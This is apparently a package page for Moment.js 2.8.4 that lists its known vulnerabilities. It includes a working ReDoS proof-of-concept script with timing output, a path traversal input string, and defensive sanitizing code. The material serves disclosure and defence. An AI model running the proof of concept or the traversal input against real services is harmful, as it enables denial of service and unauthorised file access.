Moment.js version 2.8.4 is a minor update to the popular JavaScript date manipulation library, following version 2.8.3. Both versions retain the core functionality that makes Moment.js a developer favourite: parsing, validating, manipulating, and formatting dates and times. They share identical descriptions, development dependencies, repository information, and author details, which points to a focus on stability and incremental improvement. Developers familiar with 2.8.3 will find the transition to 2.8.4 seamless.
The critical difference lies in the release date. Version 2.8.4 was released on November 19, 2014, whereas 2.8.3 arrived on September 5, 2014. This two-month gap suggests bug fixes or enhancements incorporated into 2.8.4. While the specific changes aren't detailed in the provided metadata, developers who rely on precise date handling should prefer the newer version to benefit from potential stability improvements and edge-case resolutions. The shared dependency list, including testing and build tools (Grunt, Karma, Nodeunit), underscores the project's commitment to quality and consistent development practices across versions. Users starting new projects should opt for 2.8.4 as the more recent stable release. Existing users might consider upgrading after reviewing the detailed changelog (available on the Moment.js website or GitHub repository) to determine whether the changes address specific needs or issues encountered in their applications.
All the vulnerabilities related to version 2.8.4 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
// Proof of concept from the advisory: time moment.duration() on ever-longer inputs.
var moment = require('moment');
// Build a string of (len + 1) copies of chr.
var genstr = function (len, chr) {
  var result = "";
  // Note: i is never declared, so this loop and the outer loop share one global.
  // The inner loop leaves i = len + 1, which is why COUNT below advances by 10001.
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);              // parse time grows superlinearly with input length
  var end = process.hrtime(start);   // [seconds, nanoseconds] elapsed
  console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string (e.g. fr) is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
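The two input guards the advisories above call for, as an added example that is not moment.js code or part of the original page: an allowlist-and-format check for a user-supplied locale name before it reaches moment.locale(), and a length bound on strings before they reach moment.duration(). The allowlist, the tag pattern and the 64-character cap are assumptions chosen for the example.

```javascript
// Constructed allowlist: the locale bundles this application actually ships.
const SUPPORTED_LOCALES = ['en', 'fr', 'de', 'pt-br', 'zh-cn'];

// Locale identifiers look like BCP-47 tags: letters and digits separated by single
// hyphens. Path separators, "..", whitespace or anything else must never reach
// moment.locale(), which in affected versions resolved the name to a file path.
const LOCALE_TAG = /^[a-z]{2,3}(-[a-z0-9]{2,8}){0,2}$/;

function sanitizeLocale(input, fallback = 'en') {
  if (typeof input !== 'string') return fallback;
  const tag = input.trim().toLowerCase();
  if (!LOCALE_TAG.test(tag)) return fallback;              // rejects 'dir/../../filename'
  return SUPPORTED_LOCALES.includes(tag) ? tag : fallback; // unknown but well-formed tags fall back too
}

// ReDoS guard: the advisory's proof of concept shows parse time growing superlinearly
// with input length, so bound the length before the string reaches moment.duration().
// A legitimate ISO 8601 duration such as 'P1Y2M10DT2H30M' is tens of characters long.
const MAX_DURATION_LEN = 64; // assumed cap for this example

function checkDurationInput(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  if (input.length > MAX_DURATION_LEN) return { ok: false, reason: 'too long' };
  return { ok: true, value: input };
}
```

Call sanitizeLocale() on the request value and pass only its result to moment.locale(); call checkDurationInput() and pass value to moment.duration() only when ok is true.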